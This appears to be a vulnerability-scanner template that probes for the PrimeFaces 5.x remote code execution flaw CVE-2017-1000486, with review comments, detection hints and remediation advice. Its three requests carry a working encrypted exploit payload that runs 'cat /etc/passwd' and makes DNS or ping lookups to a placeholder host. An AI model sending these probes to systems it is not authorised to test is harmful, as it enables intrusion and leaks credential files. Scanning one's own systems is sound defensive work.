CVE-2017-1000486_Primefaces_RCE.yaml
send:
  # Probe requests for CVE-2017-1000486. All three are GETs to the PrimeFaces
  # dynamic-content resource path with `pfdrt=sc`, `ln=primefaces`, a `cmd`
  # parameter and a long `pfdrid` value. The `pfdrid` value appears to be the
  # same in every request (only the line wrapping differs), so the requests
  # differ only in `cmd`.
  #
  # Detection hint: this resource path combined with `pfdrt=sc` and a `cmd`
  # query parameter is a distinctive pattern to alert on in web access logs
  # and WAF rules.
  #
  # NOTE(review): the `pfdrid` value carries literal `+`, `/` and `=`
  # characters. Confirm the scanner percent-encodes the query string before
  # sending; many servers decode a literal `+` in a query as a space, which
  # could turn a vulnerable host into a false negative.

  # Probe 1: `cmd` is `cat /etc/passwd` (space sent as %20). Its output is what
  # the `response` body pattern under `detect` looks for.
  - method: 'GET'
    url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=cat%20/etc/passwd&ln=primefaces&pfdri\
      d=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lvBxR9XlJ\
      NxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50id6wTK\
      6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl0OGoX\
      sH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrStfCPG\
      s1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4emCKv\
      Bz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9QpyTG\
      Mya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6X\
      8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\
      PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\
      9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LIm\
      NLdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUf\
      t/BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmG\
      ZqykJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8e\
      npl0ytV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
  # Probe 2: `cmd` is `getent hosts DNS_MARKER`. Presumably the scanner
  # replaces DNS_MARKER with a unique hostname it monitors, so the name lookup
  # is what the `oob: dns` check under `detect` observes - TODO confirm.
  - method: 'GET'
    url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=getent%20hosts%20DNS_MARKER&ln=primefa\
      ces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8l\
      vBxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq5\
      0id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQX\
      l0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrS\
      tfCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4e\
      mCKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qp\
      yTGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j\
      6X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tD\
      iPnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\
      9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImN\
      LdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/\
      BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqy\
      kJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0\
      ytV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
  # Probe 3: `cmd` is `ping -n 1 DNS_MARKER`. `-n 1` is the Windows ping count
  # option, so this looks like the Windows counterpart of the getent probe -
  # confirm. It relies on the same DNS_MARKER assumption as probe 2.
  - method: 'GET'
    url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=ping%20-n%201%20DNS_MARKER&ln=primefac\
      es&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lv\
      BxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50\
      id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl\
      0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrSt\
      fCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4em\
      CKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qpy\
      TGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6\
      X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\
      PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE9\
      W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImNL\
      djV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/B\
      rEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqyk\
      J7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0y\
      tV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
# Conditions that turn a probe result into a finding.
# NOTE(review): this file does not show whether the two entries are combined
# as any-of or all-of; confirm against the scanner's documentation.
detect:
  # Out-of-band check over DNS. Presumably satisfied when a lookup of the
  # hostname substituted for DNS_MARKER in the `send` URLs is observed -
  # TODO confirm.
  - oob:
      - dns
  # In-band check on the HTTP response body. The pattern describes a
  # passwd-style record: seven colon-separated fields, the third and fourth
  # numeric, the sixth and seventh each starting with `/`.
  # NOTE(review): every field uses `*` and the pattern is unanchored, so empty
  # fields also match (for example `:::::/:/`); a page that merely echoes such
  # text would also satisfy it. Tightening to `+` on the numeric fields is
  # worth considering if false positives show up.
  - response:
      - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
# Metadata attached to the finding when this policy matches.
meta-info:
  - title: "CVE-2017-1000486 Primetek Primefaces 5.x remote code execution"
  # Root cause as stated by the author: weak encryption plus a hardcoded
  # encryption password, which lets a single unauthenticated-looking HTTP
  # request reach code execution.
  # Remediation pointer for whoever triages the finding: upgrade PrimeFaces to
  # a release that fixes CVE-2017-1000486 (see the vendor advisory for the
  # fixed versions) and make sure the encryption secret is not left at its
  # default value.
  - description: "The vulnerability is due to weak encryption flaw and hardcoded encryption password. As a result, the malicious user may make remote code execution (RCE) via a simple HTTP call."
  - type: rce
  # NOTE(review): the scale of `threat` is not shown in this file; 98 is
  # presumably near the top of a 0-100 range - confirm.
  - threat: 98
  - tags:
      - Primetek Primefaces 5.x
      - CVE-2017-1000486